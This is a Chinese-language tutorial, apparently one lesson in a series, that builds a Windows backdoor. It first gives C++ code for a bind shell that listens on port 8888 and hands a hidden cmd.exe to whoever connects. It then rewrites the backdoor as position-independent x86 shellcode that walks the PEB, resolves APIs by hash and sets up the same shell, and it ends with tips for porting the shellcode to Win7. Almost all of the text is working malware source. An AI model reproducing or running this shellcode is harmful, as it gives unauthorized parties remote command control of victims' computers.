如下是一個經典的后門程序
#define _WINSOCK_DEPRECATED_NO_WARNINGS 1
#include<WinSock2.h>
#include<windows.h>
#include<iostream>
#pragma comment(lib, "ws2_32.lib")int main()
{//初始化網絡環境WSADATA wsaData;int result = WSAStartup(0x0202, &wsaData);SOCKET socket = INVALID_SOCKET;socket = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);SOCKADDR_IN serverAddr;serverAddr.sin_family = AF_INET;serverAddr.sin_port = htons(8888);//小端序轉大端序serverAddr.sin_addr.S_un.S_addr = INADDR_ANY;bind(socket, (LPSOCKADDR)&serverAddr, sizeof(SOCKADDR_IN));listen(socket, 0x7FFFFFFF);socket = accept(socket, 0, 0);PROCESS_INFORMATION pinfo{};STARTUPINFOA sinfo{};sinfo.cb = sizeof(STARTUPINFOA);sinfo.dwFlags = STARTF_USESTDHANDLES;sinfo.wShowWindow = SW_HIDE;sinfo.hStdInput = (HANDLE)socket;sinfo.hStdOutput = (HANDLE)socket;sinfo.hStdError = (HANDLE)socket;BOOL isSuccess = CreateProcessA(0, (LPSTR)"cmd.exe", 0, 0, TRUE, 0, 0, 0, &sinfo, &pinfo);CloseHandle(pinfo.hProcess);CloseHandle(pinfo.hThread);closesocket(socket);return 0;
}通過該程序,可以遠程操作目標機器的cmd從而進行相應操作
接下來我們通過將該后門程序轉換為匯編代碼,添加至上節課的 中
代碼實現
現以上節代碼為基礎,在payload中進行代碼實現
#include<windows.h>
#include<iostream>
void _declspec(naked)shellCode()
{__asm{// ws2_32.dll 77 73 32 5F 33 32 2E 64 6C 6C 00 長度:0xB// cmd.exe 63 6D 64 2E 65 78 65 00長度:0x8// kernel32.dll 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00// LoadLibraryA 0XC917432// WSAStartup 0x80B46A3D// WSASocketA 0xDE78322D// bind 0XDDA71064// listen 0x4BD39F0C// accept 0X1971EB1// CreateProcessA 0X6BA6BCC9// ExitProcess 0x4FD18963//1.保存字符串信息push ebpmov ebp, espsub esp, 0x30//kernel32.dllmov byte ptr ds : [ebp - 1] , 0x00mov dword ptr[ebp - 0x5], 0x6C6C642Emov dword ptr[ebp - 0x9], 0x32336C65mov dword ptr[ebp - 0xD], 0x6E72656B//cmd.exemov dword ptr[ebp - 0x11], 0x00657865mov dword ptr[ebp - 0x15], 0x2e646d63//ws2_32.dllmov byte ptr[ebp - 0x16], 0mov word ptr[ebp - 0x18], 0x6c6cmov dword ptr[ebp - 0x1C], 0x642e3233mov dword ptr[ebp - 0x20], 0x5f327377mov ecx, esplea ecx, [ecx + 0x10]push ecxcall fun_payload//popad//2.獲取模塊基址fun_GetModule :push ebpmov ebp, espsub esp, 0xcpush esimov esi, dword ptr fs : [0x30]//PEB指針mov esi, [esi + 0xc]//LDR結構體地址mov esi, [esi + 0x1c]//listmov esi, [esi]//list的第二項 kernel32mov esi, [esi + 0x8]//dllbasemov eax, esipop esimov esp, ebppop ebpretnfun_GetProcAddr :push ebpmov ebp, espsub esp, 0x20push esipush edipush edxpush ebxpush ecxmov edx, [ebp + 0X8]//dllbasemov esi, [edx + 0x3c]//lf_anewlea esi, [edx + esi]//Nt頭mov esi, [esi + 0x78]//導出表RVAlea esi, [edx + esi]//導出表VAmov edi, [esi + 0x1c]//EAT RVAlea edi, [edx + edi]//EAT VAmov[ebp - 0x4], edi//eatvamov edi, [esi + 0x20]//ENT RVAlea edi, [edx + edi]//ENT vamov[ebp - 0x8], edi//ENTVAmov edi, [esi + 0x24]//EOT RVAlea edi, [edx + edi]//mov[ebp - 0xc], edi//EOTVA//比較字符串獲取APIxor eax, eaxxor ebx, ebxcldjmp tag_cmpfirsttag_cmpLoop :inc ebxtag_cmpfirst :mov esi, [ebp - 0x8]//ENTmov esi, [esi + ebx * 4]//RVAlea esi, [edx + esi]//函數名稱字符串mov edi, [ebp + 0xc]//要查找的目標函數名稱push esi//傳參call fun_GetHashCode//獲取ENT函數名稱的哈希值cmp edi, eaxjne tag_cmpLoopmov esi, [ebp - 0xc]//eotxor edi, edi//為了不影響結果清空edimov di, [esi + ebx * 2]//eat表索引mov edx, [ebp - 0x4]//eatmov esi, [edx + edi * 4]//函數地址rvamov edx, [ebp + 0x8]//dllbaselea eax, [edx + esi]//funaddr vapop ecxpop ebxpop edxpop edipop esimov esp, ebppop ebpretn 0x8fun_GetHashCode:push ebpmov ebp, espsub esp, 0X4push ecxpush edxpush ebxmov dword ptr[ebp - 0x4], 0mov esi, [ebp + 0x8]xor ecx, ecxtag_hashLoop :xor eax, eaxmov al, [esi + ecx]test al, aljz tag_endmov ebx, [ebp - 0x4]shl ebx, 0x19mov edx, [ebp - 0x4]shr edx, 0x7or ebx, edxadd ebx, eaxmov[ebp - 0x4], ebxinc ecx//ecx++jmp tag_hashLooptag_end :mov eax, [ebp - 0x4]pop ebxpop edxpop ecxmov esp, ebppop ebpretn 0x4//payloadfun_payload:push ebpmov ebp, espsub esp, 0x300//為WSADATA結構體提升棧空間//1.先拿到dllbasecall fun_GetModule//2.獲取LoadLibraryApush 0XC917432//LoadLibraryA 哈希值push eaxcall fun_GetProcAddrmov[ebp - 0x4], eax//LoadLibraryA 地址//3.調用LoadLibraryA 加載ws2_32.dllmov ecx, [ebp + 0x8]//ws2_32.dll字符串地址push ecxcall[ebp - 0x4]//調用loadlibraya獲取 ws2_32.dllmov[ebp - 0x8], eax//ws2_32base//4.獲取kernel32 .dll模塊基址mov ecx, [ebp + 0x8]//kernel32.dll字符串地址lea ecx, [ecx + 0x13]push ecxcall[ebp - 0x4]//調用loadlibraya獲取 kernel32.dllmov[ebp - 0xc], eax//kernel32base//獲取WSAStartup地址push 0x80B46A3D//WSAStartup 哈希值push[ebp - 0x8]//ws2_32 基址call fun_GetProcAddrlea esi, [ebp - 0x300]//WSADATA 結構體push esipush 0x0202call eax//獲取 WSASocketA 地址并調用push 0xDE78322D//WSASocketA 哈希值push[ebp - 0x8]//ws2_32 基址call fun_GetProcAddr//調用WSASocketApush 0push 0push 0push 0x6push 0x1push 0x2call eaxmov[ebp - 0x10], eax//socket//獲取 bind 地址并調用push 0XDDA71064//bind 哈希值push[ebp - 0x8]//ws2_32 基址call fun_GetProcAddrmov word ptr[ebp - 0x200], 0x2mov word ptr[ebp - 0x1FE], 0X22B8//22B8 8888 大端序mov dword ptr[ebp - 0x1FC], 0 push 0x10//sizeof(SOCKADDR_IN)lea esi, [ebp - 0x200]//&SOCKADDR_INpush esipush[ebp - 0x10]//socketcall eax//獲取listen地址 并調用push 0x4BD39F0C//listen 哈希值push[ebp - 0x8]//ws2_32 基址call fun_GetProcAddrpush 0x7FFFFFFFpush[ebp - 0x10]//socketcall eax//獲取accept 并調用push 0X1971EB1//listen 哈希值push[ebp - 0x8]//ws2_32 基址call fun_GetProcAddrpush 0push 0push[ebp - 0x10]call eaxmov[ebp - 0x10], eax//初始化STARTUPINFOA結構體lea edi, [ebp - 0x90]//STARTUPINFOA結構體首地址xor eax, eaxmov ecx, 0x11cldrep stosd//重復0x11次填充數據0mov dword ptr[ebp - 0x90], 0x44//sinfo.cbmov dword ptr[ebp - 0x64], 0x100//sinfo.dwFlagsmov word ptr[ebp - 0x60], 0x0//sinfo.wShowWindowmov esi, [ebp - 0x10]//socketmov dword ptr[ebp - 0x58], esimov dword ptr[ebp - 0x54], esimov dword ptr[ebp - 0x50], esi//獲取CreateProcessA 并調用push 0X6BA6BCC9//listen 哈希值push[ebp - 0xC]//kener32 基址call fun_GetProcAddrlea edi, [ebp - 0x200]lea esi, [ebp - 0x90]mov ecx, [ebp + 0x8]lea ecx, [ecx + 0xB]push edipush esipush 0push 0push 0push 1push 0push 0push ecxpush 0call eax//CreateProcessAmov esp, ebppop ebpretn 0x4}
}
int main()
{shellCode();return 0;
}
注意:該代碼只能在Win10運行,不可在Win7運行,具體原因如下:
Win10系統kernelbase .dll中有LoadLibraryA,但Win7中沒有
解決方案如下:
1.修改獲取模塊功能,遍歷list根據模塊名稱匹配kernel32
2.將LoadLibraryA 改成LoadLibraryExA
![[C++] 一個線程打印奇數一個線程打印偶數](http://pic.xiahunao.cn/[C++] 一個線程打印奇數一個線程打印偶數)
